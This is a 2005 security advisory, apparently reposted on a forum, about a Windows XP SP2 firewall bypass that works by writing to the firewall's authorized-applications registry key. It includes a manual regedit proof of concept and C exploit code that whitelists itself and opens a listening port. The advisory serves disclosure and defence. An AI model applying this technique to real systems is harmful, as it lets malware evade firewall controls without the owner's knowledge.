Windows XP Firewall Bypassing (Registry Based) 12 Sep. 2005
http://www.securiteam.com/windowsnt...0UGUO.html
Summary
Microsoft Windows XP SP2 comes bundled with a Firewall. Direct access
to Firewall's registry keys allow local attackers to bypass the
Firewall blocking list and allow malicious program to connect the
network.
Credit:
The information has been provided by Mark Kica.
The original article can be found at:
http://taekwondo-itf.szm.sk/bugg.zip
Details
Vulnerable Systems:
* Microsoft Windows XP SP2
Windows XP SP2 Firewall has list of allowed program in registry which
are not properly protected from modification by a malicious local
attacker.
If an attacker adds a new key to the registry address of
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
SharedAccess\Parameters\FirewallPolicy\StandardProfile\
AuthorizedApplications\List, the attacker can enable his malware or
Trojan to connect to the Internet without the Firewall triggering a
warning.
Proof of Concept:
Launch the regedit.exe program and access the keys found under the
following path:
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\
SharedAccess\Parameters\FirewallPolicy\StandardProfile\
AuthorizedApplications\List
Add an entry key such as this one:
Name: C:\chat.exe
Value: C:\chat.exe:*:Enabled:chat
Exploit:
#include <stdio.h>
#include <windows.h>
#include <ezsocket.h>
#include <conio.h>
#include "Shlwapi.h"
int main( int argc, char *argv [] )
{
char buffer[1024];
char filename[1024];
HKEY hKey;
int i;
GetModuleFileName(NULL, filename, 1024);
strcpy(buffer, filename);
strcat(buffer, ":*:Enabled:");
strcat(buffer, "bugg");
RegOpenKeyEx(
HKEY_LOCAL_MACHINE,
"SYSTEM\\CurrentControlSet\\Services"
"\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile"
"\\AuthorizedApplications\\List",
0,
KEY_ALL_ACCESS,
&hKey);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer, strlen(buffer));
int temp, sockfd, new_fd, fd_size;
struct sockaddr_in remote_addr;
fprintf(stdout, "Simple server example with Anti SP2 firewall
trick ");
fprintf(stdout, " This is not trojan ");
fprintf(stdout, " Opened port is :2001 ");
fprintf(stdout, "author:Mark Kica student of Technical University
Kosice");
fprintf(stdout, "Dedicated to Katka H. from Levoca ");
sleep(3);
if ((sockfd = ezsocket(NULL, NULL, 2001, SERVER)) == -1)
return 0;
for (; ; )
{
RegDeleteValue(hKey, filename);
fd_size = sizeof(struct sockaddr_in);
if ((new_fd = accept(sockfd, (struct sockaddr *)&remote_addr,
&fd_size)) == -1)
{
perror("accept");
continue;
}
temp = send(new_fd, "Hello World", strlen("Hello
World"), 0);
fprintf(stdout, "Sended: Hello World");
temp = recv(new_fd, buffer, 1024, 0);
buffer[temp] = '\0';
fprintf(stdout, "Recieved: %s", buffer);
ezclose_socket(new_fd);
RegSetValueEx(hKey, filename, 0, REG_SZ, buffer,
strlen(buffer));
if (!strcmp(buffer, "quit"))
break;
}
ezsocket_exit();
return 0;
}
/* EoF */
Security News - Security Reviews - Exploits - Tools - UNIX Focus -
Windows Focus
Copyright © 1998-2005 Beyond Security Ltd. All rights reserved.
Terms of Use Site Privacy Statement.
Saludos cordiales. Ivan
Leer las respuestas